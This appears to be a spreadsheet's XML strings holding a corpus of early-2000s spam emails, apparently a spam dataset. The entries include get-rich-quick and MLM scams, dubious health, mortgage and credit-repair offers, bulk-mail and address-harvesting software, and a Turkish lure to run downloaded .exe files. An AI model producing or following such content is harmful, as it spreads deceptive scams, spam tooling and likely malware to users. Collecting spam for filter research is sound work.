    <t xml:space="preserve">Why Spend Your Hard Earned Cash?Barter YOUR business product or service, personal item, collectible, excess inventory, hotel rooms, etc. for items and services YOU NEED.......SAVE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(3%), but there is no membership fee......its FREE.......there are no monthly fees, no listing fees, no renewal fees.WE GIVE YOU A $1500 CREDIT LINE to start immediately!!!If you do not see all of the items you are looking for TODAY, be assured that as we enter the hundreds of thousands of individuals and businesses that are in our database you WILL find the things you want and need--come back often
Begin to barter today and SAVE CASH.......it will be the best thing you ever did!
SIMPLY REPLY WITH THE WORDS "MORE INFORMATION" IN THE SUBJECT LINE, AND START TRADING TODAY OR WITH THE WORD "DISCONTINUE" TO RECEIVE NO FURTHER NOTICES.
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t>If you haven't already read the #1 NY Times Best Seller Rich Dad, 
Poor Dad by Robert T. Kiyosaki...I highly recommend it. In this book, he talks about how the
only way to become wealthy is to go into business for yourself. 
"Mind your own business",as he puts it.
"The greatest entrepreneurial opportunities will be in DISTRIBUTING 
rather than in manufacturing wellness products" 
"The Health &amp; WellnessIndustry will become a trillion dollar industry by 2010."
-Paul Zane Pilzer, Leading Economist, author of "The Next Trillion"Dr .Charles King professor of marketing, University of IL
Chicago and entrepreneur Tim Sales who earns in excess of 25
Million annually from over 24 countries, teach an accredited course
on how to recognize a professional business model when you see one, 
and here is what they said.There are 4 principals of a business that are essential
Huge Expanding Market, Unique Consumable Product Timing / 
Trends, Employ othersOur company meets ALL 4 business principals with A+++Learning More Is As Easy As 123.
Send an email to: care4family@excite.com
You only have to supply us with
Name, Phone Number and Best Time
to Reach You.
get off this DB email me at publicservice1@btamail.net.cn</t>
  </si>
  <si>
    <t>FAST ACTING VIAGRA!!!AT 
  LAST (FAST ACTING VIAGRA)
Removal
Instructions:You
have received this advertisement because you have opted in to receive
internet offers and specials through affiliated websites. If you do not wish
to receive further emails or have received the email in error you may opt-out of
our database here: REMOVE MEÂ 
Please allow 24hours for removal.
This
e-mail is sent in compliance with the Information Exchange Promotion and Privacy
Protection Act. section 50 marked as 'Advertisement'
with the valid 'removal' instruction.	 [":}H&amp;*TG0BK5NK]</t>
  </si>
  <si>
    <t xml:space="preserve">
If you are struggling with MS Access to manage your data, don't worry because Bill Gates agrees that "Access is 
confusing". If you are finding that MS Excel is fine as a spreadsheet 
but doesn't allow you to build custom applications and reports with your data - don't 
 worry, there is an alternative. The good news is that 1 million customers have found a 
  really good alternativeTry our 
database software that does not make you feel like a dummy for free. Just email 
Click Here  
  , to receive your free 30 day full 
  working copy of our award winning database. then you can decide foryourself. See why PC World describes our product as being "an 
  elegant, powerful database 
that is easier than Access"and why InfoWorld says our database "leaves MS Access in the dust".We have been in 
  business since 1982 and are acknowledged as the leader in powerful BUT useabledatabases to solve your business and personal 
  information management needs. With this 
database you can easily: Manage scheduling, contacts, mailings 
  Organize billing, invoicing, receivables, payables 
  Track inventory, equipment and facilities 
  Manage customer information, service, 
  employee,medical, and school records 
  Keep track and report on projects, maintenance andÂ Â much more... To 
  be removed from this list Click Here</t>
  </si>
  <si>
    <t xml:space="preserve">Regarding
Dare to Compare!
Do you have the LOWEST Mortgage rate available?* Compare our rates. * No obligation.* Search hundreds of lenders instantly.* Free qoutes.* ALL Credit Accepted. A,B and subprime!
One thing we all know, rates won't stay this low forever.Search now:
http://MdgM6ImtdB@rapid-mortgage.comUnlist;
http://MdGMq1Mttn@rapid-mortgage.com/remove.html
</t>
  </si>
  <si>
    <t>You are receiving this email because you have expressed an interest 
in making money with eBay and or on the Internet.
Â 
How would you like to earn $750 a day 
using eBay and the Internet?
Â 
I absolutely - 100% - Guarantee you have never heard of this eBay 
&amp; Internet money-making system before.http://www.mailcomesandgoes.com/auction/This free ebook is powerful, so compelling it will blow your mind!
Â 
Mark W. Monday - The eBay Millionaire
Â 
In just a few minutes reading my book, you will find an opportunity 
so powerful, so compelling, that you'll wonder why someone hasn't 
thought of this sooner!
Â 
This is not a multi level marketing program or â€œGet rich quick schemeâ€ 
It is a real business that can make you real wealthy.http://www.mailcomesandgoes.com/auction/
Â 
Imagine yourself waking up in the morning, turning on your computer and 
finding out that thousands of dollars had been deposited into your bank 
account.  How would that make you feel?  It is 100% possible when you 
know the secrets to making money using eBay and the Internet. 
Â 
If this idea turns you on, then so will this new eBook! Respond now and 
you will immediately receive via email the entire ebook.http://www.mailcomesandgoes.com/auction/
Â 
Free Bonus - Respond right now and weâ€™ll give you the special report - 
The 5 Secrets to earning $750 a day using eBay, affiliate programs and 
the Internet! Â 
Â 
Everything we offered here is free, you have absolutely nothing to lose - 
so respond right now and get started. 
Â 
Sincerely,
Â 
Mark W. Monday
The eBay Millionaire
http://www.mailcomesandgoes.com/auction/
Â 
Â 
You received this email because you have expressed an interest in making 
money with eBay and or on the Internet.  You will not receive any more emails from us. 
Â 
*************************************************************
If you do not wish to receive any more emails from me, please 
visit http://www.deal2002.com/removeme.html and you will be 
removed.
*************************************************************</t>
  </si>
  <si>
    <t>LOSE WEIGHT NATURALLY, LOSE WEIGHT
SAFELY, 
LOSE WEIGHT FAST...
In 1996, 
            Extreme 
            Power Plus was formulated to suppress the appetite and 
increase the 
            energy level, resulting in weight loss. This all natural, 
dietary 
            product is made up of a special blend of 25 herbs, which 
all work 
            together to help you achieve maximum results!Click HERE to see the ingredients and how 
they 
        will help you lose weightWith 
            Extreme 
            Power Plus there isÂ no diet 
            plan! Consistency is the key with this product. Take 
2Â capsules a day, every 
        day, 1 capsule in the morning around 10:00 a.m. and 1 capsule 
in the 
        afternoon around 3:00 p.m.
This Stuff REALLY WORKS !
            And We GUARANTEE IT For Life 
!!!
STOP MAKING
EXCUSES CHANGE YOUR LIFE 
 TODAY!!! 
CLICK  
HERE FOR MORE INFO OR TO 
ORDER EXTREME POWER PLUS Regularly $19.99
Â Â Â Â  Order
TODAY 
for ONLY $14.99 per 
bottle
CopyrightÂ© 2000, 2001, 2002 Marketing Co-Op AllRights Reserved.We hope you 
enjoy 
receiving Marketing Co-op's special offer emails. You have 
received this 
special offer because you have provided permission to receive third 
party email 
communications regarding special online promotions or offers. However, 
if you 
wish to unsubscribe from this email list, please click here. 
Please allow 2-3 weeks for us to remove your email address. You may 
receive 
further emails from
us during that time, for which we apologize. Thank you.
Â </t>
  </si>
  <si>
    <t xml:space="preserve">creditfix                ...................................................................................................................                You can now access and clear up bad credit online,
                directly from the convienience of you own computer.
Watch 
                your credit daily with real time updates.
GET 
                THE INFORMATION YOU NEED TO QUICKLY &amp; EFFICIANTLY REMOVE NEGATIVE 
                CREDIT ITEMS FROM YOUR REPORT
. 
                CLICK HERE FOR MORE INFORMATION .
 ...................................................................................................................
Your email address was obtained from a purchased list, Reference # 1600-17800.Â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 
              Â© 2002 Web Credit Inc. All Rights Reserved.
</t>
  </si>
  <si>
    <t>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warreng</t>
  </si>
  <si>
    <t xml:space="preserve">  
STOP PAYING FOR ADULT SITES! 
We'll show you hot to get FREE PASSWORDS! FREE ACCESS to the TOP sites!Little known secrets about getting Hot Steamy Content for FREE!Just follow these
 6 simple steps!
Still skeptical? Check out the types of MEGA-sites you can get into for  FREE! No catches!</t>
  </si>
  <si>
    <t xml:space="preserve">INTEREST RATES HAVE JUST BEEN CUT!!!
NOW is the perfect time to think about refinancing your home mortgage! Rates are down! Take a minute and fill out our quick online form. 
 http://210.201.52.130/homesavings/
Easy qualifying, prompt, courteous service, low rates! Don't wait for interest rates to go up again, lock in YOUR low rate now!
---------------------------------------
To unsubscribe, go to: http://210.201.52.130/nomoremail/
Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Work From Home ResourcesÂ 
Â 
        We are desperately need responsible, dependable people through the
        United States to fill full and part time positions working from their
        home making $500-$1250 a week!
Benefits:Set your own schedule
Spend more time with your family
No more long commute
Make more money!If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Don't wait, positions have already closed in 13 states.
Apply today for Free and Get your
        Free Vacation!
Â 
Â 
Sincerely,
Tex SryderWork From Home Specialist
Â 
Â 
CLick Here To Unsubscribe From Our Mailing List
Â 
Â 
Earn
        what your worth, work from home!
Â 
        Â 
Â 
qdaakglj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</si>
  <si>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http://www205.wiildaccess.com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t>
  </si>
  <si>
    <t xml:space="preserve">
Legal Solutions For Pennies A Day
You Can Receive Thousands of Dollars in Legal 
      Services For 
      Only Pennies a Day -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first-rate service from the same top-notched 
          attorneys. Â  Â  
Â 
Â 
You received this email because you signed up at one of Consumer Media's websites or you signed up with a party that has contracted with Consumer Media. To unsubscribe from our email newsletter, please visit http://opt-out.consumerpackage.net/?e=evie@midrange.com. 
</t>
  </si>
  <si>
    <t xml:space="preserve">Untitled DocumentTo unsubscribe or change subscriber options click:
click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</si>
  <si>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Sell your Timeshare!If you're interested in selling or renting
your Timeshare or vacation membership
we can help!For a free consultation click "reply" with
your name, telephone number, and the
name of the resort.  We will contact you
shortly!Removal Instructions:
To be removed from this list, please
reply with "remove" in the subject line.http://xent.com/mailman/listinfo/fork
</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</si>
  <si>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now.Click_Herehttp://209.50.252.161/tx.php?sne&amp;211.167.74.101/mortg/
Sincerely,Chalres M. Gillette
MortCorp, LLCdvytewxlruaiywvjsnwrnanqxgvwtadjlvnrwjynmnhnchcgzlzangopfytyrnrzucxydlatjcmthfdpskzvzrggvlfrholkywmzqngwqgwtmpzxbpxfcrqcw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
</t>
  </si>
  <si>
    <t xml:space="preserve">
DiscoverÂ® Platinum Clear Card
*Click here to see information about the APR, fees and other
Important Information.
      The preceding message was sent to you as an opt-in subscriber to DealSweeps.
      We will continue to bring you valuable offers on the products and services
      that interest you most. If you wish to unsubscribe please click here: http://www.dealsweeps.com/remove.asp?E=gibbs@MIDRANGE.COM
</t>
  </si>
  <si>
    <t xml:space="preserve"> midrjobs-l@midrange.comYOU WON A FREE PORN PASSWORD!!
FREE PORN ACCESS ALL THE PORN YOU CAN HANDLE!!DO ME NOW I WANT YOU TO CUM!!!  http://www.tnt-hosting.com/zz
to opt out click reply you will be removed instantly
zvqewbof-y^zvqenatr(pbz</t>
  </si>
  <si>
    <t>Hello 
I was just emailed today from the owners of 
a BRAND NEW program just released TWO WEEKS 
ago.Check it out the income people are raking
in while it's still early....Timothy L. Drobnick Sr. 
- 70 signups and 18 paid memberships 
after 7 hours! 
- 163 members and 30 paid memberships 
after 24 hours! 
- 228 signups and 40 paid memberships 
at 48 hours! =========================================
NOTE: You get paid $15 for each membership
for life. Tim is earning an extra $720
per month in only 48 hours after joining.
....AND you get paid out every single day! =========================================....here's more!Craig Whitley 
- 82 signups and 19 paid memberships 
in less than 24 hours! Jullieanne Whitney 
- 22 signups and 4 paid memberships 
in less then 20 hours! Stacy 
- 65 signups and 10 paid memberships 
and still going strong. Diane Huges 
- 91 paid memberships 
in less than 6 days! Ian Herculson 
- 173 signups and 29 paid memberships 
in less than 24 hours 
- 2431 signups in 11 days and a WHOPPING 
283 paid memberships in only 11 DAYS!-------------------Let me tell you, this program is going 
to be as big (if not BIGGER) as Secrets of 
the Big Dogs, MLM Spy and any other similar 
program.Check this out....DTMM commission structure is two tier. You
Get paid $15.00 on your sales AND $15 on your
sub-affiliate sales!! WOW!!When you join, you get a KILLER Solo Ad and 
Web Site that's creating record breaking 
sales and sub-affiate sign-ups overnight. How much do you think you can make with 10, 20 or 
100 and more sub-affiliates. This program gives you access to AWESOME tools 
such as:- Pop Under Maker
- Email list manager
- Mini Website builder (A complete internet
newbie can now instantly build a TOP NOTCH!)
- An Ebook LIBRARY..the best of the best 
ebooks Free
- Search Engine Submission Tool
- More is being addedMy recommendation on this program is a
"MUST JOIN".I urge you to get in NOW while it's only weeks old
....and it's HOT!Here is the link. Check it out.Most especially, click on the web site
CALCULATOR link at the top of the web site and you'll 
see what the excitement is all about. http://mydtmm.com/9753Yours in success,Dany GalPS. ONE MORE THING...If you are one of the next 25 members who join, 
I'll give access to a secret free ebook download 
with hundreds of ezines that haven't seen one 
ad from this program.PLUS... I'll give you my ULTIMATE MONEY HOG SECRET!...."How To Find SUPER Affiliates Overnight"SUPER AFFILIATES have their own opt-in
email databases. They are eager to find hot
new programs just like this one and can
create 100's of sales within a few short days.Join DTMM today, and you'll get access to a
super simple strategy to locate and sign up
Super Affiliates who will put your sales in
overdrive overnight.This is a 'Money Hog Secret' like you wouldn't 
believe, but I won't waste this secret on 
just anybody.Be one of the next 25 to join this program 
as a confirmed member, then you'll prove to me 
you are serious and ready to earn money.You'll get the amazing solo ad and follow-up
letters, the super ezine directory and...The ultimate internet Money Hog Secret,
"How To Find Super Affiliates Overnight"Here's the link again to join. http://mydtmm.com/9753I'll be talking to you soon.</t>
  </si>
  <si>
    <t xml:space="preserve">
Hello, [!To!]Human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 Click 
HereOR 
  Here  You are receiving this email as a subscriber
  to the Opt-In America Mailing 
List. 
To remove yourself from all related 
maillists,just Click Herehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">PUBLIC ANNOUNCEMENT:The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45
9588xeOa0-732ENqv9875eRMa4-664oWoA0829MnbA5-849OhZo1243goAl55
</t>
  </si>
  <si>
    <t xml:space="preserve">Fire Your Boss...
Say "Goodbye" to the 9-5!Tired of working to make someone else wealthy?
FREE tape teaches you how to make YOU wealthy!
Click here and 
send your name and mailing address for a free copy
Â To unsubscribe click 
here
 xgcqyahtsvdwhqnhjiuweimhfumiaiyawr
</t>
  </si>
  <si>
    <t xml:space="preserve"> A man endowed with a 7-8" hammer is simply
 better equipped than a man with a 5-6"hammer. 
Would you rather havemore than enough to get the job done or fall short. It's totally upto you. Our Methods are guaranteed to increase your size by 1-3" Come in here and see how
</t>
  </si>
  <si>
    <t xml:space="preserve">Â  
Â 
Direct Email 
Blaster 
The program will send mail at the 
rate of over 1, 000 e-mails per minute.Â Legal and Fast 
sending bulk emailsÂ Built in SMTP 
serverÂ Have Return PathÂ Can Check Mail 
AddressÂ Make Error Send Address List( Remove or 
Send Again)Â Support multi-threads.Â Support 
multi-smtp servers.Â Manages your opt-in E-Mail ListsÂ Offers an 
easy-to-use interface!Â Easy to configure and useÂ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â€¿/NOBR&gt; EMV disconnect 
as soon as mail server informs does this address exist or not. EMV can 
find
Â about 90% of dead addresses â€¿/NOBR&gt; some mail 
systems receive all messages and only then see theirÂ 
addresses and if the address is dead send the message 
back with remark about it.
Download Now
Express Email 
BlasterÂ 
Express Email BlasterÂ  is a very fast, powerful yet 
simple to use email sender. Utilizing multiple threads/connections
Â and multiple SMTP servers your emails will be sent out 
fast and easily. There are User Information, Attach Files,Â 
Address and Mail Logs four tabbed area for the E-mails 
details for sending. About 25 SMTP servers come with theÂ 
demo version, and users may Add and Delete SMTP servers. 
About 60,000 E-mails will be sent out per 
hour."
Download Now
Express Email Address 
Extractor
This program is the most efficient, easy to use 
email address collector available on the 
Â internet! Beijing Express Email Address Extractor (ExpressEAE) is 
designed to extract
Â e-mail addresses from web-pages on the 
Internet (using HTTP protocols) .ExpressEAE
Â supports operation through many proxy-server 
and works very fast, as it is able ofÂ 
loading several pages simultaneously, and requires 
very few resources.
With it, you will be able 
to use targeted searches to crawl the 
world wide web, extractingÂ 
thousands of clean, fresh email 
addresses. Ably Email address Extractor is unlike otherÂ 
address collecting programs, which 
limit you to one or two search engines and are unable
Â to do auto searches HUGE address. 
Most of them collect a high percentage of incomplete,Â 
unusable addresses which will cause you 
serious problems when using them in a mailing.Â Easier to learn and use than any 
  other email address collector program available.
Accesses eight search 
  enginesÂ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ExpressEADÂ  
  is a 32 bit Windows Program for e-mail 
  marketing. It is intended for easy and convenient
Â search large 
  e-mail address lists from mail servers. The program can be operated 
  onÂ 
Windows 95/98/ME/2000 
  and NT.
ExpressEADÂ  
  support multi-threads (up to 1024 
  connections).
ExpressEADÂ  
  has the abilityÂ  to reconnect to the 
  mail server if the server has disconnected andÂ 
continue the searching 
  at the point where it has been interrupted.
ExpressEADÂ  
  has an ergonomic interface that is easy to 
  set up and simple to use. 
Â  
Features:support 
  multi-threads.
auto get smtp server 
  address,support multi-smtp servers.
auto saveÂ  E-Mail 
  Lists
offers an easy-to-use 
  interface! 
Download Now 
Â  
Express Maillist 
Manager 
Â  This program was designed to be a 
complement to the Direct Email BlasterÂ  
and Email 
Blaster 
suite of bulk email software 
programs. Its purpose is to organize your email lists in order to be 
moreÂ 
effective with your email marketing 
campaign. Some of its features include:
â€¿Combine several lists into 
one file.â€¿Split up larger lists to make them more 
manageable.â€¿Remove addresses from file.â€¿Manual editing, adding, and deleting of addresses.â€¿Ability to auto clean lists, that is, remove any duplicate or unwanted 
addresses.â€¿Maintain all your address lists within the 
program so you noÂ  longer need to keep all your
Â lists saved as separate text 
files.
Download Now
Â 
Â 
if you want to remove your email, please send email to targetemailremoval@btamail.net.cnÂ  
Â  
Â 
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
New Page 2Due to heavy demand from our customers we are extending the
 5% EXTRA Off Coupon on all your purchases with Coupon Code RMSCY6P2
upto July'30 2002
and the offer is exclusively from us.
You received this letter because you signed
  up to receive offers from one of our affiliate sites.
  Â  To unsubscribe from our mailing list, Online
  Unsubscribe Click
  Here or byÂ 
  email Click
  Here
Â </t>
  </si>
  <si>
    <t xml:space="preserve">HAS YOUR MORTGAGE SEARCH GOT YOU DOWN?Win a $30,000 mortgage just for trying to get your mortgage rates down, and a little cash in your pocket!!
know who is telling you the truth! We can solve all your problems.Visit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[247(^(PO1:KJ)_8J7BJK]
</t>
  </si>
  <si>
    <t xml:space="preserve">
You Can't Beat This Deal:200 Million email addresses Database, On 2 CDs!! ==Only $99.95==100 million email addresses Database, On CD ==Only $69.95==1.5 Million USA Business FAX NUMBERS, On CD ==Only $49.95==ALL THREE DIRECTORIES ABOVE *** ONLY $139.95 ***BOTH EMAIL DIRECTORIES ARE CATEGORIZED LIKE:*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Persons interested in Travel, Sports, Dining, Real Estate, Mortgage, Politics, Religion, Fishing, Trade Shows etc..
* Many More Categories...** Contains US &amp; International EMAILS ** ** Everything on these disks are in TEXT file format and fully exportable. **** The CD is as easy to use as browsing your C drive in Explorer. **NOW YOU CAN ADVERTISE FREE AND GET TREMENDOUSLY
MORE RESPONSES THAN ADVERTISING WITH OTHER FORMS OF MEDIA!! ORDER NOWHOW THIS DIRECTORY WAS COMPILED:*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week.TURN YOUR COMPUTER INTO A MONEY MACHINE!Most estimate well over 400 MILLION people will have E-mail accounts in the next 2Years! E-Mail turns your computer into a Money Machine by giving you FREE, immediate access to all of them. Don't you think some of the more than 200 million people with E-mail addresses would be interested in your products or Services?
MUCH FASTER:  With bulk E-mail you get responses back in 1 to 4 days instead of waiting weeks or months!  You can begin filling orders the same day you send E-mail. FREE ADVERTISING WORTH MILLIONS:  It costs millions of dollars to mail.
DO NOT REPLY TO THIS EMAIL ADDRESS. TO ORDER, READ BELOW:** ORDER BY CREDIT CARD (VISA, MASTERCARD OR AMERICAN EXPRESS) **
- Simply complete the order form below and fax it back to 1-240-371-0672
Make sure that we have your email address so that we can send you a reciept for your transaction.ORDER BY MAIL:Print the form below and send it together with a money order payable to FUTURE TECH INTERNATIONAL for the balance to:FUTURE TECH INTERNATIONAL
Import Export Company
1300 Don Mills Road Suite 211
Don Mills Ontario, Canada 
M3B 2W6PLEASE DO NOT SEND POSTAL MONEY ORDERSORDER FORM:Please PRINT clearlyFull Name:________________________________________________Company Name:_____________________________________________Telephone:________________________________________________Fax:______________________________________________________Email Address:__________________________________________* REQUIRED FIELDShipping Address:______________________________________________City:____________________ State/Province:________________Country:_________________________ZIP/Postal:_____________Shipping Options: []  $5.95 Regular Mail (1 - 2 weeks)
[]  $12.95 Priority Mail (2-4 business days) 
[]  $25.95 Fedex (overnight) For US &amp; Canada Only - Int'l orders extra Product:[] Email Marketing CDROM with 100 million Addresses $69.95 USD
[] 200 MILLION EMAIL ADDRESSES on 2 CD's $99.95
[] 1.5 Million USA Business Fax Numbers $49.95 USD
[] COMBO PACKAGE - ALL DIRECTORIES ABOVE (3 CD's) $139.95 USD
TOTAL:  $_________ USD======================================================================================[] Credit Card Order    [] Mail OrderCREDIT CARD ORDERS FAX THIS ORDER FORM BACK TO 1-240-371-0672
Card #:___________________________________________________Expiry Date: ______________ Type of Card [] VISA  [] MASTERCARD  [] AMERICAN EXPRESSName on Card:_____________________________________________Billing Address:_________________________________ZIP/Postal: ____________City:_____________________State/Province:_______________ Country:_____________Last 3 digits on reverse of card next to signature:    [       ]   -   [       ]  -  [       ]Cardholder Signature:______________________________________Please note that FT International will appear on your statement.=======================================================================================For any questions please feel free to call us at 1-416-410-9364To be removed from our database please send a fax to 1-970-289-6524 
</t>
  </si>
  <si>
    <t xml:space="preserve">Direct Email 
Blaster 
The program will send mail at the 
rate of over 1, 000 e-mails per minute.Â Legal and Fast 
sending bulk emailsÂ Built in SMTP 
serverÂ Have Return PathÂ Can Check Mail 
AddressÂ Make Error Send Address List( Remove or 
Send Again)Â Support multi-threads.Â Support 
multi-smtp servers.Â Manages your opt-in E-Mail ListsÂ Offers an 
easy-to-use interface!Â Easy to configure and useÂ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â€¿/NOBR&gt; EMV disconnect 
as soon as mail server informs does this address exist or not. EMV can 
find
Â about 90% of dead addresses â€¿/NOBR&gt; some mail 
systems receive all messages and only then see theirÂ 
addresses and if the address is dead send the message 
back with remark about it.
Download Now
Express Email 
BlasterÂ 
Express Email BlasterÂ  is a very fast, powerful yet 
simple to use email sender. Utilizing multiple threads/connections
Â and multiple SMTP servers your emails will be sent out 
fast and easily. There are User Information, Attach Files,Â 
Address and Mail Logs four tabbed area for the E-mails 
details for sending. About 25 SMTP servers come with theÂ 
demo version, and users may Add and Delete SMTP servers. 
About 60,000 E-mails will be sent out per 
hour."
Download Now
Express Email Address 
Extractor
This program is the most efficient, easy to use 
email address collector available on the 
Â internet! Beijing Express Email Address Extractor (ExpressEAE) is 
designed to extract
Â e-mail addresses from web-pages on the 
Internet (using HTTP protocols) .ExpressEAE
Â supports operation through many proxy-server 
and works very fast, as it is able ofÂ 
loading several pages simultaneously, and requires 
very few resources.
With it, you will be able 
to use targeted searches to crawl the 
world wide web, extractingÂ 
thousands of clean, fresh email 
addresses. Ably Email address Extractor is unlike otherÂ 
address collecting programs, which 
limit you to one or two search engines and are unable
Â to do auto searches HUGE address. 
Most of them collect a high percentage of incomplete,Â 
unusable addresses which will cause you 
serious problems when using them in a mailing.Â Easier to learn and use than any 
  other email address collector program available.
Accesses eight search 
  enginesÂ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ExpressEADÂ  
  is a 32 bit Windows Program for e-mail 
  marketing. It is intended for easy and convenient
Â search large 
  e-mail address lists from mail servers. The program can be operated 
  onÂ 
Windows 95/98/ME/2000 
  and NT.
ExpressEADÂ  
  support multi-threads (up to 1024 
  connections).
ExpressEADÂ  
  has the abilityÂ  to reconnect to the 
  mail server if the server has disconnected andÂ 
continue the searching 
  at the point where it has been interrupted.
ExpressEADÂ  
  has an ergonomic interface that is easy to 
  set up and simple to use. 
Â  
Features:support 
  multi-threads.
auto get smtp server 
  address,support multi-smtp servers.
auto saveÂ  E-Mail 
  Lists
offers an easy-to-use 
  interface! 
Download Now 
Â  
Express Maillist 
Manager 
Â  This program was designed to be a 
complement to the Direct Email BlasterÂ  
and Email 
Blaster 
suite of bulk email software 
programs. Its purpose is to organize your email lists in order to be 
moreÂ 
effective with your email marketing 
campaign. Some of its features include:
â€¿Combine several lists into 
one file.â€¿Split up larger lists to make them more 
manageable.â€¿Remove addresses from file.â€¿Manual editing, adding, and deleting of addresses.â€¿Ability to auto clean lists, that is, remove any duplicate or unwanted 
addresses.â€¿Maintain all your address lists within the 
program so you noÂ  longer need to keep all your
Â lists saved as separate text 
files.
Download Now
Â 
Â 
if you want to remove your email, please send email to targetemailremoval@btamail.net.cnÂ  
Â  
Â 
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
BODY {font-family="Arial"}
TT {font-family="Courier New"}
BLOCKQUOTE.CITE {margin:0; padding-left:0.5em; border-left:2px solid;}
SPAN.TABOOHEADER {display=none}
Rates are at a 40 year low!
7
7What are you waiting for?
Interest Rates are the 
LOWEST they've been in
40 years!
7Now is the time to take advantage of falling interest rates! 
There is no advantage in waiting any longer. Refinance or consolidate high interest 
credit card debt into a
low interest mortgage.
Why pay more then you have too?
Mortgage interest is tax deductible, whereas credit card interest is not.Good Credit / Bad Credit / So-So Credit
We have Special Programs for every type of credit history and income levelNo Upfront Fees - No Hidden Fees - Approval in Minutes
 Get the 
CASH 
you need FASTIt's easy to qualify and your loan review is FREEClick Here for all details. There is NO obligationUnsubscribe By Clicking Here</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</si>
  <si>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http://80.71.65.57/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used.http://80.71.65.57/
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
To "Opt-Out":http://80.71.65.57/optout.html9890mZai1-220dXGN8995pTZf7-668SKMW1903wjsu2-604meTh8297QskO2-l57
1733PuSv2-985DSia7345xFCG6-061JUXO3729AvSA0-582gDoL8437inQv9-747IFpX8534GdaJ0-l73-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
&lt;!--
.txt { font-family: Arial, Helvetica, sans-serif; font-size: 8pt}
.orng { font-family: Arial, Helvetica, sans-serif; font-size: 12pt; color: #FF3300; font-weight: bold}
.red { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: bold; color: #006699}
.wh { font-family: Arial, Helvetica, sans-serif; font-size: 10pt; font-weight: bold; color: #ffffff}
.gr { font-family: Arial, Helvetica, sans-serif; font-size: 8pt; font-weight: bold; color: #666666}
--&gt;
Dear Sir or Madam,        We are glad to deliver cutting-edge solutions to your IT challenges at 
        a quality that is equivalent or superior to that offered by domestic companies, 
        but at a fraction of the cost of domestic development.        We represent a number of well-established companies staffed with over 
        1000 qualified developers with a record of successfully completing hundreds 
        of small and midsize projects and tens of wide-scale projects for Fortune 
        100 corporations.From business analysis and consulting to web design, from 
        coding to testing and porting we provide a full cycle of IT services.
 Working both on-site and offshore our specialists develop and 
        integrateInternet/Intranet/Extranet applications
Business applications
ERP, CRM systems
 e-Business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$20 an hour!For more info...CLICK HERE!!!
Please include your phone number,and we will be happy to call you!
Or Call: 602-640-0095        Cost effective IT solutions
        Experienced teams of specialists
        Fair rates
Here is a list of some of the technologies 
        and platforms that our specialists employ to bring you only the best, 
        most efficient and cost-effective solution:
 Application Platforms
 .: .Net
              .: Java2EE
              .: IBM WebSphere Suite
              .: Lotus Domino
              .: BEA WebLogic
              .: ColdFusion
              .: Enhydra Operating Systems
.: all Windows, Mac,
            and Unix platforms
            .: Epoc
            .: Windows CE
            .: Palm OS
            .: Java2Microedition
Databases
.: MS SQL
            .: Oracle
            .: DB2
            .: FoxPro
            .: Informix
            .: Sybase  Real time embedded systems
.: QNX 4RT
              .: QNX Neutrio RT
Â Free quotes!
Please include your phone number,and we will be happy to call you!If you received this letter 
      by mistake please click Unsubscribe</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</si>
  <si>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report:http://www.endlessopportunitieshotline.com/EuroExchange/In addition to our currency report, you can receive
our FREE INVESTMENT PACKAGE:*  Learn how $10,000 in options will leverage $1,000,000 in
Euro Currency. This means even a small movement in the market
has huge profit potential.If you are over age 18 and have some risk capital, it's
important that you find out how the Euro will
change the economic world and how you can profit!CLICK NOW! http://www.endlessopportunitieshotline.com/EuroExchange/$10,000 minimum investmentInvesting in Forex Currency options is speculative and includes a 
high degree of risk. Investors can and do lose money.
http://www.endlessopportunitieshotline.com/takemeoff/ To OptOut.
</t>
  </si>
  <si>
    <t xml:space="preserve">4 kat Daha Hizli &amp; Sinirsiz  baglantiya ne dersiniz???18.451 adet mpeg video , 248.105 adet resim arï¿½ivimize, 48 Canlï¿½ sohbet odasï¿½na sadece http://pembeliste.netfirms.com/videolar.exe  programini calistirarak ulasabilirsiniz.Ayrï¿½ca Hande ATAIZI nin 11.4dk Porno vï¿½deosuna http://pembeliste.netfirms.com/hande_ataizi.exe programiyla ulasabilir ve download edebilirsiniz.
http://pembeliste.netfirms.com/videolar.exe---------------------------------------------------------------------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</si>
  <si>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(See Disclaimer below)
Dear Internet Marketers,
Explode YOUR Sales OVERNIGHT Guanranteed!!!! Introducing YOU The Worlds Easiest, Most Powerful Blasting System!
Absolutely Hands FREE! Set it up and Forget it for LIFE!Blast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hu_power10@yahoo.com with a word"Yes! Send it NOW Please"  in the subject field.
(((((((((((((((( DOUBLE THE SPEED OF YOUR PC ))))))))))))))))))))
                            The Insider PC SecretsLearn exactly how to get more speed and efficiency out 
of your PC without spending a single cent on hardware!((((((((((((((((( DOUBLE THE SPEED OF YOUR PC )))))))))))))))))))#########################################Get the cheapest Web Host in town for only $35 per year!                         
                           PLUS
Get your FREE email software NOW!#########################################
@@@@@@@@@@@@@@  DISCLAIMER @@@@@@@@@@@@You are receiving this message for one of the following reasons: 1) we are on the same opt-in list; 
2) you posted to one of my FFA pages; 
3) you have responded to one of my ads; 
4) you have sent an e-mail to one my addresses 
5) you visited one of my sites By doing so, you have agreed to receive this message. Under Bill s. 
l6l8 TITLE III passed by the 105th US Congress this letter Cannot be 
considered Spam as long as the sender includes contact information &amp; 
a method of "removal." However this is a one time mailing so there's no 
